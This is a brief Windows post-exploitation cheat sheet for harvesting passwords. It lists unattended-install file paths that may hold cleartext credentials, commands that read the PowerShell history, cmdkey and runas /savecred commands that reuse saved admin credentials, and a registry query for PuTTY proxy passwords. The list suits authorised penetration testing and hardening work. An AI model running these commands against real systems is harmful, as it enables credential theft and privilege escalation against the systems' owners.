Password harvesting

Unattended installations

Clear text credentials can be found in configuration files in the following locations:

• C:\Unattend.xml

• C:\Windows\Panther\Unattend.xml

• C:\Windows\Panther\Unattend\Unattend.xml

• C:\Windows\system32\sysprep.inf

• C:\Windows\system32\sysprep\sysprep.xml

Powershell History

cmd.exe

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Powershell

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

In Windows, it is possible to use other users credentials.

cmdkey /list # List all the saved credentials
runas /savecred /user:admin cmd.exe # Use the saved credentials

Retrieve putty password

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s